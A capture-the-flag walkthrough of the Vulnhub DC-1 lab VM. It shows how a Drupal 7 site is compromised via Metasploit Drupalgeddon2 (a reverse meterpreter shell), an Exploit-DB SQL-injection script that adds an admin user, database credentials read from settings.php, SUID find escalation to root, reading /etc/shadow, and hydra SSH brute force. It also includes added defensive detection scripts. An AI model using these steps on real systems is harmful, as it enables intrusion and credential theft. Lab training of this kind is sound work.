Vulnhub-DC:1
Target VM: https://www.vulnhub.com/entry/dc-1-1,292/
Hello everyone. We are Yiren Security (亿人安全); our aim is to bring security to a hundred million people, which is both what we want to do and why we started this public account. We hope that, through practical content, you get to know this industry better and pick up knowledge that is useful to you.
Scan the LAN to find the target's IP

┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhill/arp-scan/#arp-scan)
192.168.86.1    00:50:56:c0:00:08    VMware, Inc.
192.168.86.2    00:50:56:eb:cf:2c    VMware, Inc.
192.168.86.139  00:0c:29:57:9d:78    VMware, Inc.
192.168.86.254  00:50:56:18:17:1c    VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 1.942 seconds (131.82 hosts/sec). 4 responded
Scan the host

┌──(root㉿kali)-[~]
└─# nmap -sV -p- 192.168.86.139
Starting Nmap 7.91 ( https://nmap.org )
Nmap scan report for 192.168.86.139
Host is up (0.0013s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
80/tcp    open  http    Apache httpd 2.2.22 ((Debian))
111/tcp   open  rpcbind 2-4 (RPC #100000)
34068/tcp open  status  1 (RPC #100024)
MAC Address: 00:0C:29:57:9D:78 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.52 seconds
Visit the web page

Browsing to http://192.168.86.139 shows a stock "Welcome to Drupal Site" front page ("No front page content has been created yet.") with a user login block (Username, Password, Create new account, Request new password). The Wappalyzer extension identifies the stack: CMS Drupal, web server Apache 2.2.22, operating system Debian, programming language PHP 5.4.45, JavaScript library jQuery 1.4.4.
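A defender's counterpart to the fingerprinting above: Drupal 7 states its exact version on the first line of CHANGELOG.txt, so a script can compare that against the releases that fixed the two bugs this walkthrough relies on later, 7.32 for Drupalgeddon (CVE-2014-3704) and 7.58 for Drupalgeddon2. This is an added example, not code from the original post; the CHANGELOG.txt snippet is constructed and the advisory names are the Drupal security team's IDs for those fixes.

```shell
#!/bin/sh
# Added example: check a Drupal 7 version against the releases that fixed
# Drupalgeddon (SQL injection, fixed in 7.32) and Drupalgeddon2 (Forms API
# property injection, fixed in 7.58).

# Extract "7.24" from the first line of a Drupal 7 CHANGELOG.txt, which
# looks like "Drupal 7.24, 2013-11-20".
drupal_version_from_changelog() {
    head -n 1 | sed -n 's/^Drupal \([0-9][0-9]*\.[0-9][0-9]*\).*/\1/p'
}

# Print one line per unpatched advisory. Returns 0 if anything was printed,
# 1 when the version is at or above both fix releases, 2 on bad input.
drupal7_unpatched() {
    ver=$1
    case "$ver" in
        7.*) ;;
        *) echo "not a Drupal 7 version: $ver" >&2; return 2 ;;
    esac
    minor=${ver#7.}
    minor=${minor%%[!0-9]*}          # "7.24-dev" -> 24
    [ -n "$minor" ] || { echo "unparsable version: $ver" >&2; return 2; }
    found=1
    if [ "$minor" -lt 32 ]; then
        echo "Drupalgeddon (SA-CORE-2014-005): $ver < 7.32"
        found=0
    fi
    if [ "$minor" -lt 58 ]; then
        echo "Drupalgeddon2 (SA-CORE-2018-002): $ver < 7.58"
        found=0
    fi
    return $found
}

# Constructed sample: the first lines of a Drupal 7 CHANGELOG.txt.
SAMPLE_CHANGELOG='Drupal 7.24, 2013-11-20
-----------------------'

ver=$(printf '%s\n' "$SAMPLE_CHANGELOG" | drupal_version_from_changelog)
echo "detected Drupal $ver"
drupal7_unpatched "$ver" || echo "no known Drupalgeddon exposure"
```

On a live host, pipe the real file in: `drupal_version_from_changelog < /var/www/CHANGELOG.txt` (the path is an assumption; use wherever the site root lives).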
Use msf to find and exploit the vulnerability

┌──(root㉿kali)-[~]
└─# msfconsole
(banner)
       =[ metasploit v6.0.30-dev                          ]
+ -- --=[ 2099 exploits - 1129 auxiliary - 357 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: You can use help to view all available commands
Search for exploits

msf6 > search drupal

Matching Modules
================

   #  Name                                           Disclosure Date  Rank       Check  Description
   -  ----                                           ---------------  ----       -----  -----------
   0  auxiliary/gather/drupal_openid_xxe             2012-10-17       normal     Yes    Drupal OpenID External Entity Injection
   1  auxiliary/scanner/http/drupal_views_user_enum  2010-07-02       normal     Yes    Drupal Views Module Users Enumeration
   2  exploit/multi/http/drupal_drupageddon          2014-10-15       excellent  No     Drupal HTTP Parameter Key/Value SQL Injection
   3  exploit/unix/webapp/drupal_coder_exec          2016-07-13       excellent  Yes    Drupal CODER Module Remote Command Execution
   4  exploit/unix/webapp/drupal_drupalgeddon2       2018-03-28       excellent  Yes    Drupal Drupalgeddon 2 Forms API Property Injection
   5  exploit/unix/webapp/drupal_restws_exec         2016-07-13       excellent  Yes    Drupal RESTWS Module Remote PHP Code Execution
   6  exploit/unix/webapp/drupal_restws_unserialize  2019-02-20       normal     Yes    Drupal RESTful Web Services unserialize() RCE
   7  exploit/unix/webapp/php_xmlrpc_eval            2005-06-29       excellent  Yes    PHP XML-RPC Arbitrary Code Execution

Interact with a module by name or index. For example info 7, use 7 or use exploit/unix/webapp/php_xmlrpc_eval
Select the exploit module (the candidates can be tried in order) and view its parameters with show options

msf6 > use exploit/unix/webapp/drupal_drupalgeddon2
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > show options

Module options (exploit/unix/webapp/drupal_drupalgeddon2):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   DUMP_OUTPUT  false            no        Dump payload command output
   PHP_FUNC     passthru         yes       PHP function to execute
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT        80               yes       The target port (TCP)
   SSL          false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI    /                yes       Path to Drupal install
   VHOST                         no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.86.138   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic (PHP In-Memory)
Set the target and launch the attack

msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rhosts 192.168.86.139
rhosts => 192.168.86.139
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > exploit

[*] Started reverse TCP handler on 192.168.86.138:4444
[*] Executing automatic check (disable AutoCheck to override)
[!] The service is running, but could not be validated.
[*] Sending stage (39282 bytes) to 192.168.86.139
[*] Meterpreter session 1 opened (192.168.86.138:4444 -> 192.168.86.139:48889) at 2021-06-08 16:03:15 +0800

The attack succeeds

meterpreter >
Enter a shell and list the files in the current directory with ls

meterpreter > shell
Process 3465 created.
Channel 0 created.
ls
COPYRIGHT.txt
INSTALL.mysql.txt
INSTALL.pgsql.txt
INSTALL.sqlite.txt
INSTALL.txt
LICENSE.txt
MAINTAINERS.txt
README.txt
UPGRADE.txt
authorize.php
cron.php
flag1.txt
includes
index.php
install.php
misc
modules
profiles
robots.txt
scripts
sites
themes
update.php
web.config
xmlrpc.php
View flag1.txt

cat flag1.txt
Every good CMS needs a config file - and so do you.
Find the config file

cd sites
ls
README.txt
all
default
example.sites.php
cd default
ls
default.settings.php
files
settings.php
cat settings.php
<?php

/**
 *
 * flag2
 * Brute force and dictionary attacks aren't the
 * only ways to gain access (and you WILL need access).
 * What can you do with these credentials?
 *
 */

$databases = array (
  'default' =>
  array (
    'default' =>
    array (
      'database' => 'drupaldb',
      'username' => 'dbuser',
      'password' => 'R0ck3t',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);

/**
 * Access control for update.php script.
 *
 * If you are updating your Drupal installation using the update.php script but
 * are not logged in using either an account with the "Administer software
 * updates" permission or the site maintenance account (the account that was
 * created during installation), you will need to modify the access check
 * statement below. Change the FALSE to a TRUE to disable the access check.
 * After finishing the upgrade, be sure to open this file again and change the
 * TRUE back to a FALSE!
 */
Back in the shell, upgrade to a tty with Python's pty module and connect to the database

python -c 'import pty;pty.spawn("/bin/sh")'
$ mysql -u dbuser -p
Enter password: R0ck3t
List the databases

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| drupaldb           |
+--------------------+
2 rows in set (0.00 sec)

mysql> use drupaldb
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
Query all users

mysql> select * from users;
(the pass column, a salted hash per user, is omitted here)
uid | name  | mail              | theme | signature | signature_format | created    | access     | login      | status | timezone            | language | picture | init              | data
  0 |       |                   |       |           | NULL             |          0 |          0 |          0 |      0 | NULL                |          |       0 | NULL              | NULL
  1 | admin | admin@example.com |       |           | NULL             | 1550581826 | 1550583852 | 1550582362 |      1 | Australia/Melbourne |          |       0 | admin@example.com | b:0;
  2 | Fred  | fred@example.org  |       |           | filtered_html    | 1550581952 | 1550582225 | 1550582225 |      1 | Australia/Melbourne |          |       0 | fred@example.org  | b:0;
3 rows in set (0.00 sec)
Use an Exploit-DB script to add a privileged account

┌──(root㉿kali)-[~]
└─# searchsploit drupal
(listing abridged to the entries legible in the screenshot)
--------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                           |  Path
--------------------------------------------------------------------------------------------------------- ---------------------------------
Drupal 4.5.3 < 4.6.1 - Comments PHP Injection                                                            | php/webapps/1088.pl
Drupal 4.7 - 'Attachment mod_mime' Remote Command Execution                                              | php/webapps/1821.php
Drupal 5.21/6.16 - Denial of Service                                                                     | php/dos/10826.sh
Drupal 6.15 - Multiple Persistent Cross-Site Scripting Vulnerabilities                                   | php/webapps/11060.txt
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User)                                        | php/webapps/34992.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Admin Session)                                         | php/webapps/44355.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (1)                              | php/webapps/34984.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (2)                              | php/webapps/34993.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Remote Code Execution)                                 | php/webapps/35150.php
Drupal 7.12 - Multiple Vulnerabilities                                                                   | php/webapps/18564.txt
Drupal 7.x Module Services - Remote Code Execution                                                       | php/webapps/41564.php
Drupal < 7.34 - Denial of Service                                                                        | php/dos/35415.txt
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit)                                 | php/webapps/44557.rb
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC)                              | php/webapps/44542.txt
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit)         | php/webapps/44449.rb
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC)                | php/webapps/44448.py
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution                      | php/remote/44482.rb
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)    | php/remote/46510.rb
Drupal < 8.6.10 / < 8.5.11 - REST Module Remote Code Execution                                           | php/webapps/46452.txt
Drupal < 8.6.9 - REST Module Remote Code Execution                                                       | php/webapps/46459.py
Drupal Module CODER 2.5 - Remote Command Execution (Metasploit)                                          | php/webapps/40149.rb
Drupal Module Coder < 7.x-1.3 / < 7.x-2.6 - Remote Code Execution                                        | php/remote/40144.php
Drupal Module RESTWS 7.x - PHP Remote Code Execution (Metasploit)                                        | php/remote/40130.rb
--------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

┌──(root㉿kali)-[~]
└─# python /usr/share/exploitdb/exploits/php/webapps/34992.py -t http://192.168.86.139 -u kali -p 123

(banner)
 Drup4l 7.0 < 7.31 sql-1nj3ct1on
 Admin 4ccount cr3ator

 Discovered by:
 Stefan Horst
 (CVE-2014-3704)

 Written by:
 Claudio Viviani

 http://www.homelab.it
 info@homelab.it
 homelabit@protonmail.ch

 https://www.facebook.com/homelabit
 https://twitter.com/homelabit
 https://plus.google.com/+Homelabit1/

[!] VULNERABLE!

[!] Administrator user created!

[*] Login: kali
[*] Pass: 123
[*] Url: http://192.168.86.139/
Check the database: the account was added

mysql> select * from users;
(the pass column is again omitted)
uid | name  | mail              | theme | signature | signature_format | created    | access     | login      | status | timezone            | language | picture | init              | data
  0 |       |                   |       |           | NULL             |          0 |          0 |          0 |      0 | NULL                |          |       0 | NULL              | NULL
  1 | admin | admin@example.com |       |           | NULL             | 1550581826 | 1550583852 | 1550582362 |      1 | Australia/Melbourne |          |       0 | admin@example.com | b:0;
  2 | Fred  | fred@example.org  |       |           | filtered_html    | 1550581952 | 1550582225 | 1550582225 |      1 | Australia/Melbourne |          |       0 | fred@example.org  | b:0;
  3 | kali  |                   |       |           | NULL             |          0 |          0 |          0 |      1 | NULL                |          |       0 | NULL              | NULL
4 rows in set (0.00 sec)
Log in to the site

On the Drupal "User login" form, log in with username kali and password 123.
Click Content

After login the administration toolbar appears (Dashboard, Content, Structure, Appearance, People, Modules, Configuration, Reports, Help; Add content / Find content; My account; Log out). Open Content.
Find flag3

The content list (filterable by status and type) shows a Basic page titled flag3, authored by admin, published, updated 02/20/2019 - 00:44, with edit/delete operations. Opening it shows:

Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.
First, look at files with the SUID bit set

$ find / -type f -perm -u=s 2>/dev/null
/bin/mount
/bin/ping
/bin/su
/bin/ping6
/bin/umount
/usr/bin/at
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/find
/usr/sbin/exim4
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1/dbus-daemon-launch-helper
/sbin/mount.nfs
Escalate privileges with find

$ find . -exec '/bin/sh' \;
# whoami
root
#
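From the defender's side, the SUID bit planted on find is exactly what a baseline check should catch: the script below (an added example, not part of the original post) reads the output of the same find command and reports every SUID binary that is not in a known-good list. The BASELINE list is an assumption about what a stock Debian 7 install sets SUID; the sample input is constructed from the listing above.

```shell
#!/bin/sh
# Added example: report SUID binaries that are not in a known baseline.
# BASELINE is an assumption: the SUID set of a stock Debian 7 install.
BASELINE='/bin/mount
/bin/ping
/bin/ping6
/bin/su
/bin/umount
/sbin/mount.nfs
/usr/bin/at
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/procmail
/usr/lib/dbus-1/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/pt_chown
/usr/sbin/exim4'

# Read SUID paths on stdin, one per line, and print those absent from BASELINE.
# Returns 0 when nothing unexpected was found, 1 otherwise.
audit_suid() {
    unexpected=0
    while IFS= read -r path; do
        [ -n "$path" ] || continue
        if ! printf '%s\n' "$BASELINE" | grep -qxF -- "$path"; then
            echo "UNEXPECTED SUID: $path"
            unexpected=1
        fi
    done
    return $unexpected
}

# Live use:  find / -type f -perm -u=s 2>/dev/null | audit_suid
# Constructed sample: part of the SUID list the walkthrough found on DC-1.
SAMPLE='/bin/mount
/bin/su
/usr/bin/passwd
/usr/bin/find
/usr/lib/openssh/ssh-keysign'

printf '%s\n' "$SAMPLE" | audit_suid || echo "baseline differs; investigate"
```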
Read the shadow file and find the flag4 user

# cat /etc/shadow
(hash fields shortened)
root:$6$...:17955:0:99999:7:::
daemon:*:17946:0:99999:7:::
bin:*:17946:0:99999:7:::
sys:*:17946:0:99999:7:::
sync:*:17946:0:99999:7:::
games:*:17946:0:99999:7:::
man:*:17946:0:99999:7:::
lp:*:17946:0:99999:7:::
mail:*:17946:0:99999:7:::
news:*:17946:0:99999:7:::
uucp:*:17946:0:99999:7:::
proxy:*:17946:0:99999:7:::
www-data:*:17946:0:99999:7:::
backup:*:17946:0:99999:7:::
list:*:17946:0:99999:7:::
irc:*:17946:0:99999:7:::
gnats:*:17946:0:99999:7:::
nobody:*:17946:0:99999:7:::
libuuid:!:17946:0:99999:7:::
Debian-exim:!:17946:0:99999:7:::
statd:*:17946:0:99999:7:::
messagebus:*:17946:0:99999:7:::
sshd:*:17946:0:99999:7:::
mysql:!:17946:0:99999:7:::
flag4:$6$...:17946:0:99999:7:::
Brute-force flag4's password with hydra and the John wordlist

hydra -l flag4 -P john-1.8.0/run/password.lst ssh://192.168.220.130 -f -vV -o hydraflag4.ssh

[ATTEMPT] target 192.168.86.139 - login "flag4" - pass "scooter" - [child 14] (0/2)
[ATTEMPT] target 192.168.86.139 - login "flag4" - pass "shalom" - 1510 of 3561 [child 15] (0/2)
[22][ssh] host: 192.168.86.139   login: flag4   password: orange
[STATUS] attack finished for 192.168.86.139 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-06-08 20:18:34
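The hydra run above leaves an unmistakable trail in the target's sshd log: a burst of "Failed password" lines for one user from one source, followed here by an "Accepted password" line. The awk filter below, an added example not from the original post, counts failures per (source, user) pair over constructed sample lines in the standard Debian auth.log format and flags any pair at or above a threshold, noting when the same source later logged in successfully.

```shell
#!/bin/sh
# Added example: flag SSH password-guessing bursts in sshd auth.log lines.
# Usage: ssh_bruteforce_report THRESHOLD < /var/log/auth.log

ssh_bruteforce_report() {
    threshold=${1:-10}
    awk -v threshold="$threshold" '
        # Lines handled (sshd format):
        #   ... sshd[PID]: Failed password for USER from IP port N ssh2
        #   ... sshd[PID]: Failed password for invalid user USER from IP port N ssh2
        #   ... sshd[PID]: Accepted password for USER from IP port N ssh2
        /sshd\[[0-9]+\]: Failed password for / {
            user = ""; ip = ""
            for (i = 1; i <= NF; i++) {
                if ($i == "for") user = ($(i+1) == "invalid") ? $(i+3) : $(i+1)
                if ($i == "from") ip = $(i+1)
            }
            if (user != "" && ip != "") fails[ip " " user]++
        }
        /sshd\[[0-9]+\]: Accepted password for / {
            for (i = 1; i <= NF; i++) if ($i == "from") ok[$(i+1)]++
        }
        END {
            for (k in fails) if (fails[k] >= threshold) {
                split(k, p, " ")
                printf "%s failed %d logins as %s%s\n", p[1], fails[k], p[2],
                       (p[1] in ok) ? " and later SUCCEEDED" : ""
            }
        }'
}

# Constructed sample: three failures then a success from one source, and a
# single stray failure from another that should stay below the threshold.
SAMPLE='Jun  8 20:18:30 DC-1 sshd[2231]: Failed password for flag4 from 192.168.86.138 port 51234 ssh2
Jun  8 20:18:30 DC-1 sshd[2233]: Failed password for flag4 from 192.168.86.138 port 51236 ssh2
Jun  8 20:18:31 DC-1 sshd[2235]: Failed password for flag4 from 192.168.86.138 port 51238 ssh2
Jun  8 20:18:34 DC-1 sshd[2237]: Accepted password for flag4 from 192.168.86.138 port 51240 ssh2
Jun  8 21:02:10 DC-1 sshd[2301]: Failed password for invalid user bob from 10.0.0.5 port 4000 ssh2'

printf '%s\n' "$SAMPLE" | ssh_bruteforce_report 3
```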
The flag4 user can log in to the system via ssh

┌──(root㉿kali)-[~]
└─# ssh flag4@192.168.86.139
flag4@192.168.86.139's password:
Linux DC-1 3.2.0-6-486 #1 Debian 3.2.102-1 i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Go to flag4's home directory /home/flag4, find the file flag4.txt, and read flag4

flag4@DC-1:~$ cd /home
flag4@DC-1:/home$ ls
flag4
flag4@DC-1:/home$ cd flag4
flag4@DC-1:~$ ls
flag4.txt
flag4@DC-1:~$ cat flag4.txt
Can you use this same method to find or access the flag in root?

Probably. But perhaps it's not that easy. Or maybe it is?
Get root, go to /root and find thefinalflag.txt; done

flag4@DC-1:~$ mkdir abc
flag4@DC-1:~$ find abc -exec '/bin/sh' \;
# cd /root
# ls
thefinalflag.txt
# cat thefinalflag.txt
Well done!!!!

Hopefully you've enjoyed this and learned some new skills.

You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7